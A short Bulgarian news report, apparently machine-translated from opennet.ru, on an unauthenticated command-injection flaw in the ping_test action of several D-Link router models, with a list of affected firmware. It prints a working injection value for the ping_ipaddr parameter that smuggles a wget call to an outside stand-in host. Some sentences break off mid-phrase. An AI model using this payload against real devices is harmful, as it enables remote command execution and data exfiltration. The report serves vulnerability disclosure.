В безжичните рутери на D-Link
Интересното е, че според разработчиците на фърмуера извикването „ping_test“ трябва да се изпълни само след удостоверяване, но в действителност се извиква във всеки случай, независимо от влизането в уеб интерфейса. По-специално, при достъп до скрипта apply_sec.cgi и предаване на параметъра „action=ping_test“, скриптът пренасочва към страницата за удостоверяване, но в същото време изпълнява действието, свързано с ping_test. За изпълнение на кода е използвана друга уязвимост в самия ping_test, която извиква помощната програма ping, без правилно да проверява коректността на IP адреса, изпратен за тестване. Например, за да извикате помощната програма wget и да прехвърлите резултатите от командата „echo 1234“ към външен хост, просто посочете параметъра „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$(ехо 1234)".
Наличието на уязвимостта е официално потвърдено в следните модели:
- DIR-655 с фърмуер 3.02b05 или по-стар;
- DIR-866L с фърмуер 1.03b04 или по-стар;
- DIR-1565 с фърмуер 1.01 или по-стар;
- DIR-652 (не е предоставена информация за проблемни версии на фърмуера)
Периодът на поддръжка за тези модели вече е изтекъл, така че D-Link
По-късно беше открито, че уязвимостта също е била
Източник: opennet.ru